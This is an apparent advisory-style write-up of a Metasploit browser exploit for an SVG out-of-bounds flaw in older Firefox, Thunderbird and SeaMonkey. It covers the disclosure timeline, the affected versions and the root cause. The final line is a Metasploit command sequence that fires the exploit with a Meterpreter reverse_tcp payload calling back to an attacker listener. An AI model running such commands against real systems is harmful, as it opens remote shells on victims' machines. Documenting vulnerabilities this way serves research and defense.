Vulnerability discovered by regenrecht
Vulnerability reported by regenrecht to ZDI
Vulnerability reported to the vendor by ZDI the 2011-12-01
Coordinated public release of the vulnerability the 2011-12-20
Metasploit PoC provided the 2012-05-07
PoC provided by :
Affected version(s) :
Mozilla Firefox before version 9.0
Mozilla Firefox before version 3.6.28
Mozilla Thunderbird before version 9.0
Mozilla SeaMonkey before version 2.6
Tested on Windows XP Pro SP3 with :
Mozilla Firefox before version 7.0.1
This metasploit module is quiet unstable and exploitation is random.
This module exploits an out-of-bounds access flaw in Firefox 7 and 8. The notification of nsSVGValue observers via nsSVGValue::NotifyObservers(x,y) uses a loop which can result in an out-of-bounds access to attacker-controlled memory. The mObserver ElementAt() function (which picks up pointers), does not validate if a given index is out of bound. If a custom observer of nsSVGValue is created, which removes elements from the original observer, and memory layout is manipulated properly, the ElementAt() function might pick up an attacker provided pointer, which can be leveraged to gain remote arbitrary code execution.
use exploit/windows/browser/mozilla_nssvgvalue set SRVHOST 192.168.178.100 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit getuid sysinfo